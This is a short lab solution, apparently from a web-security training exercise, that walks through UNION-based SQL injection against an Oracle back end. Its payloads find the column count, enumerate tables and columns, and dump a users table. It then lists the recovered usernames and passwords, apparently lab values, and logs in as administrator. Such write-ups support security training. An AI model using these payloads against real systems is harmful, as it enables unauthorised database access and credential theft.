SQL injection attack, listing the database content 1

SQL injection attack, listing the database contents on Oracle

Solution

Get numer of columns

' UNION SELECT NULL,NULL FROM dual--

Get table_name from all_tables

' UNION SELECT table_name,NULL FROM all_tables--

Get column_name from all_tab_columns

' UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name = 'USERS_WPDEKE'--
I found two columns:
USERNAME_EJIJIK
PASSWORD_OPTWOW

Get password for user administrator

' UNION SELECT USERNAME_EJIJIK,PASSWORD_OPTWOW FROM USERS_WPDEKE--

I found 3 user/password records:
administrator
l2ddv6bhye9h3mxs9h68

carlos
kyydfqct3bmz6jy4xhy5

wiener
75uf5kl9cq1bqyxrju9k

Login as user: administrator

administrator
l2ddv6bhye9h3mxs9h68